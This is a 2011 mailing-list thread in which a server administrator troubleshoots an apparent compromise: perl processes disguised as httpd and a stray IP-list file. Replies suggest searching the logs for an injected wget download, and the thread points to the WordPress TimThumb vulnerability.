On Thu 06 Oct 2011 10:32:14 PM IST, Michael Mol wrote: > > On Oct 6, 2011 12:57 PM, "Nilesh Govindarajan" <cont...@nileshgr.com > <mailto:cont...@nileshgr.com>> wrote: > > > > On Thu 06 Oct 2011 09:06:06 PM IST, Alberto Luaces wrote: > > > Nilesh Govindarajan writes: > > > > > >> One of the servers I manage has a strange problem. > > >> > > >> Every 24h, someone starts a process shows up as perl in the list, but > > >> launching command is /usr/sbin/httpd. > > >> It shows just one process, but when I run something like this: > > >> > > >> ps -C perl -o cmd,pid > > >> > > >> I get some 5-6 processes alternatively with cmd as /usr/sbin/httpd or > > >> /usr/bin/perl. > > >> > > >> The even more interesting thing is, /usr/sbin/httpd does not exist. > > >> I suspect a rootkit, but chkrootkit & rkhunter reported nothing. > > >> > > >> Also, I found a mysterious file: /tmp/ips.txt with following content: > > >> xxx.xxx.xxx.xxx > > >> 127.0.0.1 > > >> addr:xxx.xxx.xxx.xxx > > >> addr: > > >> addr:127.0.0.1 > > >> addr: > > >> > > >> Somebody is aware of a malware/rootkit which creates such files? > > > > > > I had some of that recently. The attacker used a instance of > phpmyadmin > > > to inject into its URL a wget command to download a perl script from > > > another site. Look for `wget' into apache logs. > > > > > > > @all > > Apache was never installed & I don't see any reason to install it > > because nginx satisfies my needs. I grepped for the string wget in all > > logs and php files, found some, but they were for libssh2 in wordpress > > code. > > @Michael, > > I thought of doing that, but before I discovered the file, I'd already > > killed the processes. Will check later when the process is relaunched > > sometime later. > > You might crank up service log levels in anticipation, too, and prod > your firewall to log unusual-but-allowed connections, too. >
I just found something: http://blog.vaultpress.com/2011/08/02/vulnerability-found-in-timthumb/ Data on just one of the wordpress installations seems to be deleted, which seems to me as an effect of this. We're removing timthumb and will watch. Thanks for the tip :-) -- Nilesh Govindarajan http://nileshgr.com
